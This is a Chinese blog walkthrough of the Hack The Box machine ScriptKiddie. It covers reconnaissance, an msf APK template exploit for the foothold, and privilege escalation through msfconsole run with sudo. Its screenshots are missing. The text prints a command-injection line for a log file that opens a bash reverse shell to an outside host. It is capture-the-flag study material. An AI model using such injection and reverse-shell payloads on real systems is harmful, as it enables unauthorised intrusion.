HTB-ScriptKiddie

在这里插入图片描述

HTB-ScriptKiddie

信息收集

nmap
在这里插入图片描述
5000端口如下。

在这里插入图片描述
测试nmap
在这里插入图片描述
测试exploit
在这里插入图片描述
测试sploits
在这里插入图片描述

在这里插入图片描述

尝试绕过,开启与否的url编码前后一致。在这里插入图片描述
目前没有发现有利用的地方,继续回到payloads继续测试。
在这里插入图片描述
现在payloads有三个可能存在漏洞的地方。

  • windows template file
  • linux template file
  • apk template file
    分别使用搜索引擎。
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述
比较在意其中APK的一个相关搜索结果。
在这里插入图片描述
msf也找到得到对应的。
在这里插入图片描述看了一下会
在这里插入图片描述
随便换了个payload
在这里插入图片描述
这个负载会生成一个apk文件,并且在payloads进行写入的时候,反手注入写入者一波。但是失败了。
在这里插入图片描述
又换了一个payload
在这里插入图片描述
顺利利用。
在这里插入图片描述

开机

在这里插入图片描述

提权

在这里插入图片描述
有一个.sudo_as_admin_successful文件,但是是空的,它为什么会出现在这里。
在这里插入图片描述
sudo -l需要kid的密码,但是目前没有。
在这里插入图片描述

在.ssh文件里面找到了authorized_keys,此文件内一般会有用户密码,但是现在这个文件是空的,并且可以修改,所以可以选择修改文件使用ssh登录。在这里插入图片描述来到了pwn用户目录。在这里插入图片描述

有一个脚本,同样能够修改和执行,功能是什么呢。简单地说就是读取/home/kid/logs/hackers文件内容,并且经过一些处理后使用nmap扫描。
在这里插入图片描述
然后此应用是以pwn身份运行,可以在脚本后面加上一句反弹,就能收到pwn身份的shell了,注意这个脚本会一直循环读取hackers文件

在这里插入图片描述看来直接添加到scanlosers.sh文件是不行的所以来仔细看看这个脚本干了什么。
先给log赋一个文件的路径。切换到pwn用户根目录。
在这里插入图片描述
然后以' '为分隔符,留下第2' '以后的所有字符,又以ascii码排序并去重,最后读取前面一系列操作后的结果作为ip变量的值。
在这里插入图片描述
再看看后面的代码,判断这个hackers文件行数是否大于0,是的话就给hackers文件一个不自动换行的参数-n,简单来说就是就是让hackers文件为空。
在这里插入图片描述

不出意外这样输入就能获得pwnshell,但是我写不进去。
在这里插入图片描述
权限上又能写,什么情况呢。

在这里插入图片描述

写入前面的authorized_keys文件看看,这个文件能写入但是hackers为什么不能写入呢。

在这里插入图片描述
因为前面提到过authorized_keys文件会一直不停读取hackers文件,如果输入后行数大于0就会被执行脚本后立即清空。所以直接写进去应该就能读取了。

现在来构造一下语句,要通过cutsort,就需要这样构造shell;从左到右无论成功与否都会执行。

  127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1"

但是会报错重定向。
在这里插入图片描述
会不会是这后面导致重定向错误,反弹语句后面跟上注释符#试试。
在这里插入图片描述

  127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1" #

在这里插入图片描述
切换到pwn用户后,发现能用sudo运行msf
在这里插入图片描述
可以看到使用sudo登陆的msf拥有root的权限。

在这里插入图片描述
正在sudo权限下的msf中反弹即可,也可以直接在msf中建了一个shell,使用bash应该就可以了。
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值